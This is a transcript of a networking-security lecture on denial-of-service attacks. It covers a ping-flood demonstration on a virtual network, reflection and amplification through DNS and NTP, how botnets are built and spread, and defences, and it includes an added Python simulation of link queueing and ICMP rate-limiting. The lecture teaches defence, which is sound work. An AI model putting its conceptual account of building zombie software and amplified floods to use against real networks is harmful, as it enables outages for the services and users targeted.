So those four should respond, generating 160 kilobits per second, four times 40, and our capacity is 100. We're sending at 160, so we should overload the link. Let's try it. Let's check, is it working? Why is it slow? There we go: coming in at around 160, going out at the capacity of 100. Let's see on our browser now, on node 3, the response. I'll reload. Note up here it's loading the page; it's not responding very fast, at least. Let's try something else. Let's try a link to page two, connecting... Node 3 trying to browse to the target web server is getting no response. So the denial of service is working in this case; we're denied access to that website. It may connect, or it may... So why is it not connecting? Waiting down here, what's happening? We've got many ping packets coming into node 7, and it's sending out as fast as possible, 100 kilobits per second, and then node 3 tries to set up a TCP connection. So it sends a packet to node 7, but that packet has to wait for all those pings to be sent to node 8. So there's a large delay at node 7. There are many packets coming in, only some of them going out; the others are waiting in the queue to be sent, including the one from node 3, which has to wait in the queue for a long time. Now maybe it gets sent and the response comes back slowly, and then the request goes, or in the worst case it gets here and has to wait so long that eventually it's dropped. It doesn't get sent at all, so the request from 3 to 8 doesn't get there, or the response doesn't get back. We got to page two eventually, so it did load there. If we try page six again, you see the response time is very, very poor in this case. It's trying to send its packets to node 8, but all the ping packets are going to node 8. What if we stop that one and just modify it a little bit? Let's say two and a half packets per second. So in this case, around this, right? So again, around 100 kilobits per second coming in, 100 coming out. Now there may be a little bit of delay.
It's hard to notice, but again the capacity may not be fully utilized, so our packets are passing through. So from the attacker's perspective, we must generate enough traffic such that the normal users' traffic is delayed a long time and eventually dropped, and to do that we just need to fill up that link, fill up the capacity. So that was around 80 kilobits per second. Questions? Okay, so how do we fix this? How do we stop such an attack? There are different ways. Yes, one thing that node 7 could do is, since it's receiving many pings coming in, node 7 could be set up to say, okay, my capacity here is 100 kilobits per second; if I receive pings at a larger rate, don't try and send them, drop them immediately, so that the web traffic can get through. So give priority to the web browsing traffic going across this link compared to other traffic, the ping traffic. So yes, you could set up node 7 to try and drop the ping packets. Let's look at the other issues. Just come back to our slides and see. Okay, so we've gone through, I think... We didn't demonstrate this attack; this requires a protocol that will send a bigger reply than the request. Ping doesn't. Protocols that do include DNS, SNMP for network management, a few other security protocols and network protocols. Network Time Protocol, which synchronizes the clock on your computer, does. Correct, for DNS to work these hosts on the internet can't be normal hosts.
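The two things the demo showed at node 7, the web request waiting behind a queue of reflected pings and the "drop pings above a rate" fix, can be reproduced offline with a small queue model. This is an added worked example of mine, not the lecture's or the demo's code: a FIFO tail-drop model of the 100 kbit/s link from node 7 to node 8, fed by four reflectors answering a given number of pings per second, with one legitimate 60-byte TCP connection request from node 3 arriving two seconds in. Assumed parameters are the 20-packet buffer, the request size and timing, and the 20 kbit/s ICMP policer; the 1028-byte ping size is the 1000-byte payload plus ICMP and IP headers, so the lecture's 40 kbit/s per node comes out at about 41 here. The third scenario is the countermeasure described above, implemented as a token bucket on ICMP in front of the queue.

```python
from collections import deque
from dataclasses import dataclass

LINK_BPS = 100_000      # node 7 -> node 8 bottleneck capacity, as in the demo
QUEUE_LIMIT = 20        # assumed: packets node 7 buffers before tail-dropping
ICMP_BYTES = 1028       # 1000-byte ping payload + 8-byte ICMP + 20-byte IP header
TCP_SYN_BYTES = 60      # assumed size of node 3's connection request to the web server
SYN_AT = 2.0            # constructed: the browser clicks a link 2 s into the attack


@dataclass
class Pkt:
    t: float            # arrival time at node 7 (seconds)
    size: int           # bytes on the wire
    proto: str          # "icmp" (reflected echo reply) or "tcp" (legitimate request)


def reflected_pings(reflectors: int, pps: float, duration: float) -> list:
    """Echo replies arriving at node 7: `reflectors` hosts each answering `pps`
    spoofed pings per second. Phases are staggered evenly (constructed input;
    real reflectors would be less regular)."""
    pkts = []
    for i in range(reflectors):
        phase = i / (pps * reflectors)
        k = 0
        while phase + k / pps < duration:
            pkts.append(Pkt(phase + k / pps, ICMP_BYTES, "icmp"))
            k += 1
    return pkts


class TokenBucket:
    """Ingress policer: ICMP may use at most `rate_bps` of the outgoing link."""
    def __init__(self, rate_bps: float, burst_bytes: int):
        self.rate = rate_bps / 8.0          # bytes per second
        self.burst = burst_bytes
        self.tokens = float(burst_bytes)
        self.last = 0.0

    def allow(self, t: float, size: int) -> bool:
        self.tokens = min(self.burst, self.tokens + (t - self.last) * self.rate)
        self.last = t
        if self.tokens >= size:
            self.tokens -= size
            return True
        return False


def run(pkts, link_bps=LINK_BPS, queue_limit=QUEUE_LIMIT, icmp_policer=None):
    """FIFO tail-drop link. Returns (sent, stats); sent holds
    (proto, size, arrival, departure) for every packet that was transmitted."""
    in_system = deque()         # departure times of packets queued or being sent
    last_departure = 0.0
    sent, stats = [], {"queue_drops": 0, "policed": 0}
    for p in sorted(pkts, key=lambda p: p.t):
        while in_system and in_system[0] <= p.t:
            in_system.popleft()             # finished transmitting before this arrival
        if p.proto == "icmp" and icmp_policer is not None and not icmp_policer.allow(p.t, p.size):
            stats["policed"] += 1           # the countermeasure: excess pings dropped at ingress
            continue
        if len(in_system) >= queue_limit:
            stats["queue_drops"] += 1       # buffer full: tail drop, whatever the protocol
            continue
        start = max(p.t, last_departure)
        last_departure = start + p.size * 8 / link_bps   # serialization time on the link
        in_system.append(last_departure)
        sent.append((p.proto, p.size, p.t, last_departure))
    return sent, stats


def scenario(pps: float, reflectors: int = 4, duration: float = 5.0, icmp_limit_bps=None) -> dict:
    pkts = reflected_pings(reflectors, pps, duration)
    pkts.append(Pkt(SYN_AT, TCP_SYN_BYTES, "tcp"))
    policer = TokenBucket(icmp_limit_bps, 2 * ICMP_BYTES) if icmp_limit_bps else None
    sent, stats = run(pkts, icmp_policer=policer)
    icmp_bits_out = sum(s * 8 for pr, s, a, d in sent if pr == "icmp" and d <= duration)
    syn = [d - a for pr, s, a, d in sent if pr == "tcp"]
    return {"offered_kbps": reflectors * pps * ICMP_BYTES * 8 / 1000,
            "icmp_out_kbps": icmp_bits_out / duration / 1000,
            "syn_delay_s": syn[0] if syn else None,    # None: the request was tail-dropped
            **stats}


if __name__ == "__main__":
    for label, kw in [("2 pings/s per reflector, no defence", dict(pps=2)),
                      ("5 pings/s per reflector, no defence", dict(pps=5)),
                      ("5 pings/s, ICMP policed to 20 kbit/s at node 7", dict(pps=5, icmp_limit_bps=20_000))]:
        print(label, scenario(**kw))
```

At two pings per second the link carries about 66 kbit/s and the request waits at most one ping's serialization time; at five the link saturates, the buffer fills, and the request that arrives two seconds in sits behind some 17 queued pings for well over a second, which is the stall seen in the browser. With ICMP policed at 20 kbit/s the pings are thrown away before they reach the queue and the request goes straight through, at the cost of also dropping legitimate pings above that rate.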
They need to be DNS servers. So for a real attack to work you need many DNS servers on the internet to attack, but there are a lot that will respond, and there are real attacks that use that. So it's not so simple that we can use any computer on the internet, but remember there are, what, hundreds of millions if not billions of devices on the internet. You just need some of them to respond, thousands maybe, a small fraction. Sending to a broadcast address works really well in theory, because you send one and many people reply, but in practice most devices block such packets, so it's not really useful in practice today. Everything up until now, these devices were not infected. That is, they were just normal computers on the internet; therefore it's quite easy to find computers to send to. But the next form is that the attacker gets some malicious software onto some computers on the internet. Maybe many people have some virus that the attacker has programmed, and that virus initiates an attack. So the attacker takes control of computers on the internet. We call them zombies, where a collection of zombies is referred to as a botnet, a network of bots, and gets those zombies to initiate the attack. The zombies ping other computers on the internet, and they reply to the target. What does the attacker need to do, and what resources does the attacker's network need?
Well, all it needs to do is control the zombies: send a special message to the zombie saying start your attack on this target. It doesn't send the ping messages; it just sends one simple control message to the zombies saying start to ping this target, and then they start pinging random addresses, usually, on the internet, and if you ping thousands, some will reply and overflow the target. So a botnet contains many computers under the control of the attacker, which the attacker uses to initiate the attack on some target. And there's talk of botnets in the order of millions of computers in size, that some organizations have software on a million different computers, and they effectively rent that out to malicious people. So a malicious user goes to someone who has a botnet and they say, we'll pay you this amount per hour to use your botnet to attack a particular target. How do you stop that? Well, in practice it's quite hard. It comes back to making sure, or limiting the chance, of someone taking over the computer; that's important. So making sure that malicious software cannot be installed on these computers, antivirus and so on, and once discovered there are some techniques to try and redirect the traffic. So if an attack starts, then the internet service providers can try and block the traffic before it gets to the target. But many real denial of service attacks use this approach, and again, from the attacker's perspective, they are hidden even further, because tracing back from the target traces to these normal hosts, then going back traces back to the zombies, and then from there you need to trace back to the attacker. So finding the attacker is even harder. In that case the attacker needs to build this botnet, construct the attack network. They must get many slaves under their control; it's many computers.
So they need to infect those computers with some malicious software, called zombie software. So the general process is that they create some software that will do the attack, do the ping. It should run on different systems, different types of computers, so you can spread it across as many computers as possible. It should be hidden so that the normal user doesn't notice it, so the person sitting at this computer doesn't know that their computer is doing something malicious. And it should be able to be contacted by the attacker, so that the malicious software sits there until the attacker sends some trigger saying start the attack. Usually that then involves taking advantage of some vulnerability in that computer to get the zombie software installed on it. Then, once you have zombie software on there... to do that you need to find machines that you can install the zombie software on, so scan for machines, infect them, and then the zombie software automatically searches for other computers to infect. So we can have it at different levels: it's not just infect these three computers, but then they automatically try and find other computers to infect, and you get larger and larger, and that's how botnets of, say, millions of computers are created. To close, how do we stop all these attacks? And we're at what's called distributed denial of service attacks. A normal denial of service attack, think of there being one computer doing the attack, but in fact in practice we have many computers doing the attack, and they are distributed across the internet. So a DDoS, distributed denial of service attack. How do you prevent them?
Have enough resources such that if an attack takes place you can quickly allocate resources, network resources, server resources, so that if the load increases you can quickly adapt to that. But that's costly. Detect: so if an attack takes place you want to detect it as quickly as possible so you can respond in some way. Respond, how do you respond? Identify who the attackers are, try and take some action, either block the packets from that attacker, but that more comes to, okay, contacting the internet service provider and getting their internet service provider to block those computers, or even take legal action to stop them. It's usually hard to prevent a current attack, but you may prevent future attacks. So denial of service attacks try to prevent normal users from using the network, the system, the computer system, applications on those systems. You either exhaust CPU on the computer, or memory or disk, or bandwidth in a network, for example capacity. Often address spoofing, or using a fake address, is used to hide the attacker and to redirect traffic. Often we reflect packets off normal hosts, amplify the amount of data going to the target by using protocols that send small requests and large responses, use other computers under your control that are infected with some software to initiate attacks. Generally quite easy to perform; we did it quite easily on a virtual network. Hard to prevent but easy to detect, but often detection is too late, because if you're Amazon and the attack even goes for one hour before you detect or before you can respond, then that's one hour of lost money, lost income. So that's still a significant problem on the internet. Have a look at some of the other areas to explore. We will not go through them; if you're interested, explore further. Any final questions on denial of service attacks?
We've gone through demos of just some very simple ones, but they show the main concepts used by most. Try, if you like, the attack, the demo that I did; you may be able to modify it, you may be able to even do attacks with different protocols. I think you could try DNS or NTP to do an even more advanced attack. But of course, if you try anything, just do it in the virtual network, never do it in a real network. It's very easy to do it. The instructions for everything I did are linked to from the course website. Okay, so you can read everything that I did there, all those commands, so you can copy and do it yourself. You can read through all the commands, and this is linked to from the course website: the steps for creating the network, and the commands for setting up the nodes, and, for example, the commands for doing the fake source address.